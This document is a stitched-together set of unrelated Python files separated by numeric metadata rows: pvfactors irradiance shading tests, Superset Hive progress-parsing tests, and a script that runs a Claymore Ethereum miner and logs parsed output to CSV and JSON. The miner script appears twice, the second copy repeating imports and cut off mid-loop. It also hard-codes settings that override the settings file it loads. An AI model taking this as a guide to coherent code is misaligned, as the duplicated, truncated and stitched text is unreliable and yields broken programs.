    when = dt.datetime(2019, 6, 14, 11)
    model = HybridPerezOrdered(horizon_band_angle=6.5,
                               module_transparency=0.1,
                               module_spacing_ratio=0.1)
    model.fit(when, dni, dhi,
              params_irr['solar_zenith'],
              params_irr['solar_azimuth'],
              params_irr['surface_tilt'],
              params_irr['surface_azimuth'],
              params_irr['rho_ground'])
    # Build the ordered pv array and apply the model
    pvarray = OrderedPVArray.fit_from_dict_of_scalars(
        params_irr, param_names=IsotropicOrdered.params)
    model.transform(pvarray)
    ground = pvarray.ts_ground
    front_side = pvarray.ts_pvrows[1].front
    # The front side must be partly shaded for this check to be meaningful
    assert front_side.shaded_length > 0
    # Shaded surfaces keep a 0.19 fraction of the illuminated values
    # (NOTE(review): 0.19 presumably = spacing + (1 - spacing) * transparency
    # = 0.1 + 0.9 * 0.1 — confirm against the model implementation)
    gnd_shaded = ground.shaded.list_ts_surfaces[0]
    gnd_illum = ground.illum.list_ts_surfaces[0]
    for component in ('circumsolar', 'direct'):
        np.testing.assert_allclose(gnd_illum.get_param(component) * 0.19,
                                   gnd_shaded.get_param(component))
    # Same checks on the middle pv row's front surfaces
    row_shaded = front_side.list_segments[0].shaded.list_ts_surfaces[0]
    row_illum = front_side.list_segments[0].illum.list_ts_surfaces[0]
    for component in ('direct', 'circumsolar'):
        np.testing.assert_allclose(row_illum.get_param(component) * 0.19,
                                   row_shaded.get_param(component))
def test_hybridperez_ordered_transparency_spacing_back(params_irr):
    """Module transparency and spacing should scale the shaded-surface
    irradiance components in HybridPerezOrdered (back-side shading case)."""
    # Flip the array so that direct light hits the back side
    params_irr.update({'surface_azimuth': 270,
                       'surface_tilt': 160})
    dni, dhi = 1000., 100.
    when = dt.datetime(2019, 6, 14, 11)
    model = HybridPerezOrdered(horizon_band_angle=6.5,
                               module_transparency=0.1,
                               module_spacing_ratio=0.1)
    model.fit(when, dni, dhi,
              params_irr['solar_zenith'],
              params_irr['solar_azimuth'],
              params_irr['surface_tilt'],
              params_irr['surface_azimuth'],
              params_irr['rho_ground'])
    # Build the ordered pv array and apply the model
    pvarray = OrderedPVArray.fit_from_dict_of_scalars(
        params_irr, param_names=IsotropicOrdered.params)
    model.transform(pvarray)
    ground = pvarray.ts_ground
    back_side = pvarray.ts_pvrows[1].back
    # The back side must be partly shaded for this check to be meaningful
    assert back_side.shaded_length > 0
    # Shaded surfaces keep a 0.19 fraction of the illuminated values
    # (NOTE(review): 0.19 presumably = spacing + (1 - spacing) * transparency
    # = 0.1 + 0.9 * 0.1 — confirm against the model implementation)
    gnd_shaded = ground.shaded.list_ts_surfaces[0]
    gnd_illum = ground.illum.list_ts_surfaces[0]
    for component in ('circumsolar', 'direct'):
        np.testing.assert_allclose(gnd_illum.get_param(component) * 0.19,
                                   gnd_shaded.get_param(component))
    # Same checks on the middle pv row's back surfaces
    row_shaded = back_side.list_segments[0].shaded.list_ts_surfaces[0]
    row_illum = back_side.list_segments[0].illum.list_ts_surfaces[0]
    for component in ('direct', 'circumsolar'):
        np.testing.assert_allclose(row_illum.get_param(component) * 0.19,
                                   row_shaded.get_param(component))
def test_isotropic_ordered_transparency_spacing(params_irr):
    """Module transparency and spacing should scale the shaded-surface
    direct component in IsotropicOrdered."""
    dni, dhi = 1000., 100.
    when = dt.datetime(2019, 6, 14, 11)
    model = IsotropicOrdered(module_transparency=0.1,
                             module_spacing_ratio=0.1)
    model.fit(when, dni, dhi,
              params_irr['solar_zenith'],
              params_irr['solar_azimuth'],
              params_irr['surface_tilt'],
              params_irr['surface_azimuth'],
              params_irr['rho_ground'])
    # Build the ordered pv array and apply the model
    pvarray = OrderedPVArray.fit_from_dict_of_scalars(
        params_irr, param_names=IsotropicOrdered.params)
    model.transform(pvarray)
    ground = pvarray.ts_ground
    front_side = pvarray.ts_pvrows[1].front
    # The front side must be partly shaded for this check to be meaningful
    assert front_side.shaded_length > 0
    # Shaded surfaces keep a 0.19 fraction of the illuminated direct value
    # (NOTE(review): 0.19 presumably = spacing + (1 - spacing) * transparency
    # = 0.1 + 0.9 * 0.1 — confirm against the model implementation)
    gnd_illum = ground.illum.list_ts_surfaces[0]
    gnd_shaded = ground.shaded.list_ts_surfaces[0]
    np.testing.assert_allclose(gnd_illum.get_param('direct') * 0.19,
                               gnd_shaded.get_param('direct'))
    # Same check on the middle pv row's front surfaces
    row_shaded = front_side.list_segments[0].shaded.list_ts_surfaces[0]
    row_illum = front_side.list_segments[0].illum.list_ts_surfaces[0]
    np.testing.assert_allclose(row_illum.get_param('direct') * 0.19,
                               row_shaded.get_param('direct'))
def test_initialize_rho():
    """Rho initialization should prefer, in order: the scalar input, the
    calculated value, then the default value."""
    model = BaseModel()
    # Candidate rho values
    scalar_val = 0.50
    default_val = 0.01
    calculated_val = 0.10
    # A provided scalar always wins
    assert model.initialize_rho(scalar_val, calculated_val,
                                default_val) == scalar_val
    # Without a scalar, fall back to the calculated value
    np.testing.assert_allclose(
        model.initialize_rho(None, calculated_val, default_val),
        calculated_val)
    # Without either, use the default
    np.testing.assert_allclose(
        model.initialize_rho(None, None, default_val), default_val)
| 39.692982
| 85
| 0.64884
| 4,659
| 36,200
| 4.748444
| 0.067396
| 0.009764
| 0.014103
| 0.018081
| 0.859242
| 0.847896
| 0.82977
| 0.827329
| 0.820684
| 0.810921
| 0
| 0.136261
| 0.239558
| 36,200
| 911
| 86
| 39.736553
| 0.667393
| 0.077431
| 0
| 0.774011
| 0
| 0
| 0.059549
| 0
| 0
| 0
| 0
| 0.001098
| 0.180791
| 1
| 0.016949
| false
| 0
| 0.014124
| 0
| 0.031073
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67d5d0d022a52049119d5e59878e261ac97e8232
| 4,097
|
py
|
Python
|
tests/db_engine_specs_test.py
|
Marcelo-Lourenco/incubator-superset
|
70c7315ae012a16c5c9c2b8fbd30780809f1932a
|
[
"Apache-2.0"
] | 1
|
2021-02-22T03:27:27.000Z
|
2021-02-22T03:27:27.000Z
|
tests/db_engine_specs_test.py
|
Marcelo-Lourenco/incubator-superset
|
70c7315ae012a16c5c9c2b8fbd30780809f1932a
|
[
"Apache-2.0"
] | null | null | null |
tests/db_engine_specs_test.py
|
Marcelo-Lourenco/incubator-superset
|
70c7315ae012a16c5c9c2b8fbd30780809f1932a
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from superset.db_engine_specs import HiveEngineSpec
class DbEngineSpecsTestCase(unittest.TestCase):
    """Tests for ``HiveEngineSpec.progress``, which parses Hive query log
    lines (job counts, job launches, stage map/reduce percentages) into an
    overall progress percentage.

    Fix: use ``assertEqual`` instead of ``assertEquals`` — the latter is a
    deprecated alias that was removed in Python 3.12.
    """

    def test_0_progress(self):
        """Only compile/parse PerfLogger lines: no job info yet -> 0%."""
        log = """
17/02/07 18:26:27 INFO log.PerfLogger: <PERFLOG method=compile from=org.apache.hadoop.hive.ql.Driver>
17/02/07 18:26:27 INFO log.PerfLogger: <PERFLOG method=parse from=org.apache.hadoop.hive.ql.Driver>
        """.split('\n')
        self.assertEqual(
            0, HiveEngineSpec.progress(log))

    def test_number_of_jobs_progress(self):
        """Knowing the total job count alone does not advance progress."""
        log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
        """.split('\n')
        self.assertEqual(0, HiveEngineSpec.progress(log))

    def test_job_1_launched_progress(self):
        """Launching a job without stage data still reports 0%."""
        log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
17/02/07 19:15:55 INFO ql.Driver: Launching Job 1 out of 2
        """.split('\n')
        self.assertEqual(0, HiveEngineSpec.progress(log))

    def test_job_1_launched_stage_1_0_progress(self):
        """A stage at 0% map / 0% reduce contributes nothing."""
        log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
17/02/07 19:15:55 INFO ql.Driver: Launching Job 1 out of 2
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 0%,  reduce = 0%
        """.split('\n')
        self.assertEqual(0, HiveEngineSpec.progress(log))

    def test_job_1_launched_stage_1_map_40_progress(self):
        """Map 40% on job 1 of 2 -> 10% overall."""
        log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
17/02/07 19:15:55 INFO ql.Driver: Launching Job 1 out of 2
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 0%,  reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 40%,  reduce = 0%
        """.split('\n')
        self.assertEqual(10, HiveEngineSpec.progress(log))

    def test_job_1_launched_stage_1_map_80_reduce_40_progress(self):
        """Map 80% + reduce 40% on job 1 of 2 -> 30% overall."""
        log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
17/02/07 19:15:55 INFO ql.Driver: Launching Job 1 out of 2
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 0%,  reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 40%,  reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 80%,  reduce = 40%
        """.split('\n')
        self.assertEqual(30, HiveEngineSpec.progress(log))

    def test_job_1_launched_stage_2_stages_progress(self):
        """Two stages in the same job average together -> 12% overall."""
        log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
17/02/07 19:15:55 INFO ql.Driver: Launching Job 1 out of 2
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 0%,  reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 40%,  reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 80%,  reduce = 40%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-2 map = 0%,  reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 100%,  reduce = 0%
        """.split('\n')
        self.assertEqual(12, HiveEngineSpec.progress(log))

    def test_job_2_launched_stage_2_stages_progress(self):
        """Once job 2 launches, job 1 counts as done -> 60% overall."""
        log = """
17/02/07 19:15:55 INFO ql.Driver: Total jobs = 2
17/02/07 19:15:55 INFO ql.Driver: Launching Job 1 out of 2
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 100%,  reduce = 0%
17/02/07 19:15:55 INFO ql.Driver: Launching Job 2 out of 2
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 0%,  reduce = 0%
17/02/07 19:16:09 INFO exec.Task: 2017-02-07 19:16:09,173 Stage-1 map = 40%,  reduce = 0%
        """.split('\n')
        self.assertEqual(60, HiveEngineSpec.progress(log))
| 49.963415
| 113
| 0.614108
| 712
| 4,097
| 3.435393
| 0.105337
| 0.071954
| 0.103025
| 0.091578
| 0.875715
| 0.875715
| 0.849141
| 0.816844
| 0.816844
| 0.802126
| 0
| 0.229765
| 0.252136
| 4,097
| 81
| 114
| 50.580247
| 0.568538
| 0
| 0
| 0.642857
| 0
| 0.328571
| 0.650232
| 0.01855
| 0
| 0
| 0
| 0
| 0.114286
| 1
| 0.114286
| false
| 0
| 0.085714
| 0
| 0.214286
| 0.014286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c0154f00b37182fd21d3956197d0625c454e4d7d
| 19,612
|
py
|
Python
|
claymoreminerdataextractor.py
|
kynrek/ClaymoreMinerDataExtractor
|
e97b8219431ee4f9e9debaff49e2915725b35501
|
[
"MIT"
] | 1
|
2021-02-23T03:33:39.000Z
|
2021-02-23T03:33:39.000Z
|
claymoreminerdataextractor.py
|
kynrek/ClaymoreMinerDataExtractor
|
e97b8219431ee4f9e9debaff49e2915725b35501
|
[
"MIT"
] | null | null | null |
claymoreminerdataextractor.py
|
kynrek/ClaymoreMinerDataExtractor
|
e97b8219431ee4f9e9debaff49e2915725b35501
|
[
"MIT"
] | null | null | null |
#Claymore Miner Data Extraction
#author Joshua Witt kynrek@gmail.com
#Date 2-21-2021
#Description : This python script is designed to capture the standard output from claymore miner and
#extract details from the text as json objects
#Claymore Miner Data Extraction
#author Joshua Witt kynrek@gmail.com
#Date 2-21-2021
#Description : This python script is designed to capture the standard output from claymore miner and
#extract details from the text as json objects
#below is a sample command
#The script accepts a command line parameter of the folder where to store the output log/data files
import os, sys
import subprocess
from subprocess import Popen, PIPE
import json
import re
from datetime import datetime
import argparse as ap
# CLI setup: the extractor takes an output folder for its log/report files
# and an optional JSON settings file describing the miner invocation.
parser = ap.ArgumentParser(description="Claymore Miner Data Extractor")
output_directory = ''
parser.add_argument('-o', '--outputlocation', type=str, help='directory where logs and report files will be saved')
parser.add_argument('-s', '--settingsfile', type=str, help='location of a .json settings file for the miner')
args = parser.parse_args()
#if get the output location argument and assign it to
#output_directory, if there is no trailing slash for
#the directory then add it
if args.outputlocation is not None:
    if args.outputlocation[-1] != '\\':
        output_directory = '{}\\'.format(args.outputlocation)
    else:
        output_directory = args.outputlocation
    if not os.path.isdir(output_directory):
        sys.stdout.write('Output Directory {} does not exist'.format(output_directory))
        exit(-1)
#load the miner settings json file
#miner_settings_file_path = 'miner_settings.json'
if args.settingsfile is not None:
    if os.path.isfile(args.settingsfile):
        # Opening JSON file
        # NOTE(review): the file is opened without a with-block and never
        # closed explicitly
        settings_file = open(args.settingsfile)
        # It returns JSON object as dictionary
        try:
            miner_settings = json.load(settings_file)
        except Exception as e:
            sys.stdout.write('error parsing settings file {}'.format(str(e)))
            exit(-3)
    else:
        sys.stdout.write('miner settings file {} does not exist'.format(args.settingsfile))
        exit(-2)
# NOTE(review): if -s/--settingsfile is omitted, miner_settings is not yet
# defined here and these two lines raise NameError; their results are also
# discarded because both names are recomputed further below.
mining_pool_username = miner_settings['ewal'].split('.')[0]
mining_pool_worker_name = miner_settings['ewal'].split('.')[1].split(':')[0]
# NOTE(review): this hard-coded dict unconditionally overwrites whatever was
# loaded from the settings file above, which makes the -s option ineffective.
# The 'executable' value should be a raw string (r"...") — the backslashes
# survive only because none of them form recognized escape sequences.
miner_settings = {
"executable" : "C:\Claymore.s.dual.ethereum.v15.0.-.widows\EthDcrMiner64.exe",
"epool" : "us-east.ethash-hub.miningpoolhub.com:20535",
"ewal" : "kynrek.3070:x",
"fanmin" : "75",
"fanmax": "100",
"epsw" : "x",
"mode" : "1",
"dbg" : "-1",
"mport" : "0",
"etha" : "0",
"ftime" : "55",
"retrydelay" : "1",
"tt" : "79",
"ttli" : "77",
"tstop" : "89",
"esm" : "2"
}
# Build the miner command line: the executable path first, then a
# "-key value" pair for every other setting in the dict.
mining_command = []
for setting_key in miner_settings:
    if setting_key == 'executable':
        mining_command.append(miner_settings[setting_key])
    else:
        mining_command.append("-{}".format(setting_key))
        mining_command.append(miner_settings[setting_key])
print(mining_command)
#get the current timestamp for naming files
fileNow = datetime.now().strftime("%m-%d-%Y-%H-%M-%S")
#create a variable to count the number of summary records written
summary_records_written = 0
#generate our file names
summaryCSVFileName = '{}minerSummary-{}.csv'.format(output_directory,fileNow)
summaryJSONFileName = '{}minerSummary-{}.json'.format(output_directory,fileNow)
summaryLogFileName = '{}logfile-{}.txt'.format(output_directory,fileNow)
# Parse "<username>.<worker>:<password>" out of the wallet/user string.
# NOTE(review): duplicates the identical parsing done earlier in the script.
mining_pool_username = miner_settings['ewal'].split('.')[0]
mining_pool_worker_name = miner_settings['ewal'].split('.')[1].split(':')[0]
#open our files for write only mode
# NOTE(review): files are opened without with-blocks; they are only flushed,
# never closed, relying on interpreter exit for cleanup.
summaryCSVFile = open(summaryCSVFileName,"w")
summaryJSONFile = open(summaryJSONFileName,"w")
summaryLogFile = open(summaryLogFileName,"w")
#write to the log file to note the start time
summaryLogFile.write('Process Claymore Data Script for account {} worker {} Started {}\n'.format(mining_pool_username,mining_pool_worker_name,datetime.now().strftime("%m/%d/%Y %H-%M-%S")))
summaryLogFile.flush()
#initialize maximumDifficultyOfFoundShare as it is not always present and we need an initial value
maximumDifficultyOfFoundShare = ""
#create our list of files for our CSV file header
fields = [
'miningPoolUsername',
'miningPoolWorkerName',
'hoursMined',
'minutesMined',
'timeStampMonth',
'timeStampDay',
'timeStampHours',
'timeStampMinutes',
'miningServer',
'miningPort',
'miningDurationHours',
'miningDurationMinutes',
'incorrectShares',
'incorrectSharePercentage',
'estimatedStalesPercentage',
'maximumDifficultyOfFoundShare',
'acceptedShares',
'staleShares',
'rejectedShares',
'rejectedStaleShares',
'averageSpeedMinutes',
'averageMegaHashes',
'effectiveSpeed',
'effectiveSpeedAtPool',
'recordLastModified'
]
#create the header line string
headerString = ','.join(fields)
# Write the CSV header and open the JSON array; records are appended later
summaryCSVFile.write('{}\n'.format(headerString))
summaryCSVFile.flush()
summaryJSONFile.write('[\n')
summaryJSONFile.flush()
# Parsed-section holders: not every miner summary emits every line, and the
# summary record below references all of them.
timeStamp = {}
connectionInfo = {}
incorrectShares = {}
shareCount = {}
averageSpeed = {}
effectiveSpeed = {}
try:
    # Start the miner via subprocess so stdout can be captured and parsed;
    # stderr is merged into stdout so error lines are echoed/parsed too.
    p = subprocess.Popen(mining_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    while True:
        retcode = p.poll()
        input_line = p.stdout.readline().decode('utf-8')
        sys.stdout.write(input_line)
        # timestamp line of the periodic summary, e.g. "*** 1:05 *** 6/21 15:30"
        m = re.match(r"\*+ (\d+):(\d+) \*+ (\d+)/(\d+) (\d+):(\d+).*", input_line)
        if m:
            matches = m.groups()
            timeStamp = {
                "hoursMined": matches[0],
                "minutesMined": matches[1],
                "timeStampMonth": matches[2],
                "timeStampDay": matches[3],
                "timeStampHours": matches[4],
                "timeStampMinutes": matches[5]
            }
        # connection info, e.g.
        # 'Eth: Mining ETH on us-east.ethash-hub.miningpoolhub.com:20535 for 0:19'
        m = re.match(r"Eth: Mining ETH on (.*):(\d+) for (\d+):(\d+)", input_line)
        if m:
            matches = m.groups()
            connectionInfo = {
                'miningServer': matches[0],
                'miningPort': matches[1],
                'miningDurationHours': matches[2],
                'miningDurationMinutes': matches[3]
            }
        # incorrect-shares line
        m = re.match(r"Eth: Incorrect shares (\d+) \((\d+\.\d+)\%\), est. stales percentage (\d+\.\d+)\%", input_line)
        if m:
            matches = m.groups()
            incorrectShares = {
                "incorrectShares": matches[0],
                "incorrectSharePercentage": matches[1],
                "estimatedStalesPercentage": matches[2]
            }
        # maximum share difficulty (fix: the '.' was unescaped and matched any char)
        m = re.match(r"Eth: Maximum difficulty of found share: (\d+\.\d+) GH \(!\)", input_line)
        if m:
            maximumDifficultyOfFoundShare = m.groups()[0]
        # cumulative share counts
        m = re.match(r"Eth: Accepted shares (\d+) \((\d+) stales\), rejected shares (\d+) \((\d+) stales\)", input_line)
        if m:
            matches = m.groups()
            shareCount = {
                "acceptedShares": matches[0],
                "staleShares": matches[1],
                "rejectedShares": matches[2],
                "rejectedStaleShares": matches[3]
            }
        # average speed
        m = re.match(r"Eth: Average speed \((\d+) min\): (\d+\.\d+) MH/s", input_line)
        if m:
            matches = m.groups()
            averageSpeed = {
                'averageSpeedMinutes': matches[0],
                'averageMegaHashes': matches[1]
            }
        # effective speed -- the last line of a summary block, so matching it
        # triggers writing one summary record to the JSON and CSV outputs
        m = re.match(r"Eth: Effective speed: (\d+\.\d+) MH/s; at pool: (\d+\.\d+) MH/s", input_line)
        if m:
            matches = m.groups()
            effectiveSpeed = {
                'effectiveSpeed': matches[0],
                'effectiveSpeedAtPool': matches[1]
            }
            # only emit a record once every section has been seen at least
            # once; avoids a KeyError on a partial first summary
            if timeStamp and connectionInfo and shareCount and incorrectShares and averageSpeed:
                summaryRecord = {
                    'miningPoolUsername': mining_pool_username,
                    'miningPoolWorkerName': mining_pool_worker_name,
                    'timeStamp': timeStamp,
                    'connectionInfo': connectionInfo,
                    'shareCount': shareCount,
                    'incorrectShares': incorrectShares,
                    'maximumDifficultyOfFoundShare': maximumDifficultyOfFoundShare,
                    'averageSpeed': averageSpeed,
                    'effectiveSpeed': effectiveSpeed
                }
                # BUG FIX: records after the first were previously written with
                # Python repr() (single quotes), producing invalid JSON; every
                # record now goes through json.dumps, comma-separated
                prefix = ',' if summary_records_written > 0 else ''
                summaryJSONFile.write('{}{}\n'.format(prefix, json.dumps(summaryRecord)))
                summaryJSONFile.flush()
                summary_records_written = summary_records_written + 1
                values = [
                    mining_pool_username,
                    mining_pool_worker_name,
                    timeStamp['hoursMined'],
                    timeStamp['minutesMined'],
                    timeStamp['timeStampMonth'],
                    timeStamp['timeStampDay'],
                    timeStamp['timeStampHours'],
                    timeStamp['timeStampMinutes'],
                    connectionInfo['miningServer'],
                    connectionInfo['miningPort'],
                    connectionInfo['miningDurationHours'],
                    connectionInfo['miningDurationMinutes'],
                    incorrectShares['incorrectShares'],
                    incorrectShares['incorrectSharePercentage'],
                    incorrectShares['estimatedStalesPercentage'],
                    maximumDifficultyOfFoundShare,
                    shareCount['acceptedShares'],
                    shareCount['staleShares'],
                    shareCount['rejectedShares'],
                    shareCount['rejectedStaleShares'],
                    averageSpeed['averageSpeedMinutes'],
                    averageSpeed['averageMegaHashes'],
                    effectiveSpeed['effectiveSpeed'],
                    effectiveSpeed['effectiveSpeedAtPool'],
                    datetime.now().strftime("%m/%d/%Y %H:%M:%S")
                ]
                summaryCSVFile.write('{}\n'.format(','.join(values)))
                summaryCSVFile.flush()
        # per-GPU details, e.g. 'GPU1: 43C 75% 120W'
        m = re.match(r"GPU(\d+): (\d+)C (\d+)% (\d+)W", input_line)
        if m:
            matches = m.groups()
            gpuDetails = {
                'gpuNumber': matches[0],
                'gpuTemperatureCelcius': matches[1],
                'gpuPowerPercentage': matches[2],
                'gpuWattage': matches[3]
            }
        # total board power, e.g. 'GPUs power: 119.8 W'
        m = re.match(r"GPUs power: (\d+\.\d+) W", input_line)
        if m:
            gpuPower = {
                'totalGPUsPower': m.groups()[0]
            }
        # speed update, e.g. 'Eth speed: 57.581 MH/s, shares: 17/0/0, time: 1:05'
        m = re.match(r"Eth speed: (\d+\.\d+) MH/s, shares: (\d+)/(\d+)/(\d+), time: (\d+):(\d+)", input_line)
        if m:
            matches = m.groups()
            speedUpdate = {
                'ethSpeedMegaHashes': matches[0],
                'acceptedShares': matches[1],
                'staleShares': matches[2],
                'rejectedShares': matches[3],
                'miningDurationHours': matches[4],
                'miningDurationMinutes': matches[5]
            }
        if retcode is not None:
            break
except BaseException:
    # intentionally broad (replaces a bare except) so the miner process is
    # terminated even on KeyboardInterrupt; guard in case Popen itself failed
    # before p was bound
    if 'p' in locals():
        p.terminate()
#make sure to terminate the process and write close the json array in the output file
finally:
    summaryJSONFile.write(']\n')
    summaryJSONFile.flush()
    summaryLogFile.write('Process Claymore Data Script for account {} worker {} Ended {}\n'.format(mining_pool_username,mining_pool_worker_name,datetime.now().strftime("%m/%d/%Y %H-%M-%S")))
    summaryLogFile.flush()
#below is a sample command
#The script accepts a command line parameter of the folder where to store the output log/data files
import os, sys
import subprocess
from subprocess import Popen, PIPE
import json
import re
from datetime import datetime
import argparse as ap

parser = ap.ArgumentParser(description="Claymore Miner Data Extractor")
output_directory = ''
parser.add_argument('-o', '--outputlocation', type=str, help='directory where logs and report files will be saved')
parser.add_argument('-s', '--settingsfile', type=str, help='location of a .json settings file for the miner')
args = parser.parse_args()
# Normalize the output directory: append a trailing backslash if missing,
# then make sure the directory actually exists.
if args.outputlocation is not None:
    if args.outputlocation[-1] != '\\':
        output_directory = '{}\\'.format(args.outputlocation)
    else:
        output_directory = args.outputlocation
    if not os.path.isdir(output_directory):
        sys.stdout.write('Output Directory {} does not exist'.format(output_directory))
        exit(-1)
# Load the miner settings json file if one was supplied; otherwise fall back
# to the built-in defaults below.
if args.settingsfile is not None:
    if os.path.isfile(args.settingsfile):
        try:
            # context manager closes the handle (the original leaked it)
            with open(args.settingsfile) as settings_file:
                miner_settings = json.load(settings_file)
        except Exception as e:
            sys.stdout.write('error parsing settings file {}'.format(str(e)))
            exit(-3)
    else:
        sys.stdout.write('miner settings file {} does not exist'.format(args.settingsfile))
        exit(-2)
else:
    # BUG FIX: this default dict previously overwrote the settings loaded
    # from --settingsfile unconditionally; it is now only a fallback.
    miner_settings = {
        "executable": r"C:\Claymore.s.dual.ethereum.v15.0.-.widows\EthDcrMiner64.exe",
        "epool": "us-east.ethash-hub.miningpoolhub.com:20535",
        "ewal": "kynrek.3070:x",
        "fanmin": "75",
        "fanmax": "100",
        "epsw": "x",
        "mode": "1",
        "dbg": "-1",
        "mport": "0",
        "etha": "0",
        "ftime": "55",
        "retrydelay": "1",
        "tt": "79",
        "ttli": "77",
        "tstop": "89",
        "esm": "2"
    }
# Build the command line: the executable first, then "-key value" pairs.
mining_command = []
for setting_key in miner_settings:
    if setting_key == 'executable':
        mining_command.append(miner_settings[setting_key])
    else:
        mining_command.append("-{}".format(setting_key))
        mining_command.append(miner_settings[setting_key])
print(mining_command)
#get the current timestamp for naming files
fileNow = datetime.now().strftime("%m-%d-%Y-%H-%M-%S")
#create a variable to count the number of summary records written
summary_records_written = 0
#generate our file names
summaryCSVFileName = '{}minerSummary-{}.csv'.format(output_directory,fileNow)
summaryJSONFileName = '{}minerSummary-{}.json'.format(output_directory,fileNow)
summaryLogFileName = '{}logfile-{}.txt'.format(output_directory,fileNow)
#open our files for write only mode
summaryCSVFile = open(summaryCSVFileName,"w")
summaryJSONFile = open(summaryJSONFileName,"w")
summaryLogFile = open(summaryLogFileName,"w")
#write to the log file to note the start time
summaryLogFile.write('Process Claymore Data Script Started {}\n'.format(datetime.now().strftime("%m/%d/%Y %H-%M-%S")))
summaryLogFile.flush()
#initialize maximumDifficultyOfFoundShare as it is not always present and we need an initial value
maximumDifficultyOfFoundShare = ""
# CSV column names, in the order the data row is assembled below
fields = [
    'hoursMined',
    'minutesMined',
    'timeStampMonth',
    'timeStampDay',
    'timeStampHours',
    'timeStampMinutes',
    'miningServer',
    'miningPort',
    'miningDurationHours',
    'miningDurationMinutes',
    'incorrectShares',
    'incorrectSharePercentage',
    'estimatedStalesPercentage',
    'maximumDifficultyOfFoundShare',
    'acceptedShares',
    'staleShares',
    'rejectedShares',
    'rejectedStaleShares',
    'averageSpeedMinutes',
    'averageMegaHashes',
    'effectiveSpeed',
    'effectiveSpeedAtPool',
    'recordLastModified'
]
#create the header line string
headerString = ','.join(fields)
summaryCSVFile.write('{}\n'.format(headerString))
summaryCSVFile.flush()
# the JSON file holds one array of summary records; open the array now
summaryJSONFile.write('[\n')
summaryJSONFile.flush()
# Parsed-section holders: not every miner summary emits every line, and the
# summary record below references all of them.
timeStamp = {}
connectionInfo = {}
incorrectShares = {}
shareCount = {}
averageSpeed = {}
effectiveSpeed = {}
try:
    # Start the miner via subprocess so stdout can be captured and parsed;
    # stderr is merged into stdout so error lines are echoed/parsed too.
    p = subprocess.Popen(mining_command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    while True:
        retcode = p.poll()
        input_line = p.stdout.readline().decode('utf-8')
        sys.stdout.write(input_line)
        # timestamp line of the periodic summary, e.g. "*** 1:05 *** 6/21 15:30"
        m = re.match(r"\*+ (\d+):(\d+) \*+ (\d+)/(\d+) (\d+):(\d+).*", input_line)
        if m:
            matches = m.groups()
            timeStamp = {
                "hoursMined": matches[0],
                "minutesMined": matches[1],
                "timeStampMonth": matches[2],
                "timeStampDay": matches[3],
                "timeStampHours": matches[4],
                "timeStampMinutes": matches[5]
            }
        # connection info, e.g.
        # 'Eth: Mining ETH on us-east.ethash-hub.miningpoolhub.com:20535 for 0:19'
        m = re.match(r"Eth: Mining ETH on (.*):(\d+) for (\d+):(\d+)", input_line)
        if m:
            matches = m.groups()
            connectionInfo = {
                'miningServer': matches[0],
                'miningPort': matches[1],
                'miningDurationHours': matches[2],
                'miningDurationMinutes': matches[3]
            }
        # incorrect-shares line
        m = re.match(r"Eth: Incorrect shares (\d+) \((\d+\.\d+)\%\), est. stales percentage (\d+\.\d+)\%", input_line)
        if m:
            matches = m.groups()
            incorrectShares = {
                "incorrectShares": matches[0],
                "incorrectSharePercentage": matches[1],
                "estimatedStalesPercentage": matches[2]
            }
        # maximum share difficulty (fix: the '.' was unescaped and matched any char)
        m = re.match(r"Eth: Maximum difficulty of found share: (\d+\.\d+) GH \(!\)", input_line)
        if m:
            maximumDifficultyOfFoundShare = m.groups()[0]
        # cumulative share counts
        m = re.match(r"Eth: Accepted shares (\d+) \((\d+) stales\), rejected shares (\d+) \((\d+) stales\)", input_line)
        if m:
            matches = m.groups()
            shareCount = {
                "acceptedShares": matches[0],
                "staleShares": matches[1],
                "rejectedShares": matches[2],
                "rejectedStaleShares": matches[3]
            }
        # average speed
        m = re.match(r"Eth: Average speed \((\d+) min\): (\d+\.\d+) MH/s", input_line)
        if m:
            matches = m.groups()
            averageSpeed = {
                'averageSpeedMinutes': matches[0],
                'averageMegaHashes': matches[1]
            }
        # effective speed -- the last line of a summary block, so matching it
